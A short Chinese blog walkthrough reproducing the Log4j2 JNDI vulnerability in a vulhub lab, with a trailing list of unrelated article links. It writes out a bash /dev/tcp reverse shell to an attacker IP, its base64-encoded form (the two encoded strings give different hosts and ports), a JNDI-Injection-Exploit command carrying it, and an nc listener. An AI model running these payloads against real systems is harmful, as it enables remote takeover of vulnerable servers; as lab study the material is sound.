当前位置: 首页 > news >正文

vulhub靶场log4j2漏洞复现

开启环境

进入主页

在DNSLOG平台上获取⼀个域名来监控注⼊

开始反弹Shell,下载一个JNDI-Injection-Explo到攻击机

bash -i >& /dev/tcp/192.168.10.233/8888 0>&1

反弹base64加密

 YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMy82NjY2IDA+JjE=

最终payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=
}|{base64,-d}|{bash, -i}" -A "192.168.10.233"

监听nc -lvvp 8888

使用jdk1.8的payload直接访问


http://www.mrgr.cn/news/22307.html

相关文章:

  • Transformer预测 | 基于Transformer心率时间序列预测(tensorflow)
  • 多重继承,虚继承
  • Linux网络——Socket编程函数
  • 函数式编程思想
  • 为什么要使用大模型RAG一体机
  • 博客摘录「 华为OD机试真题- 字符串统计-2023年OD统一考试(B卷)」2024年9月8日
  • C++中的一个标准输出流——cout
  • C++ #include <cstring>(详解)
  • 力扣第42题 接雨水
  • springboot体会BIO(阻塞式IO)
  • 国内外网络安全政策动态(2024年8月)
  • 电子电气架构 --- 车身电子的未来发展
  • 效率神器Listary,附激活码
  • DdddOCR
  • mycat双主高可用架构部署-mycat安装
  • HarmonyOS应用开发( Beta5.0)一杯冰美式的时间“拿捏Grid组件”
  • 小怡分享之数据结构LinkedList与链表
  • 第十一周:机器学习
  • Python中如何实现字符串的查询和替换?
  • 春日美食汇:基于SpringBoot的订餐平台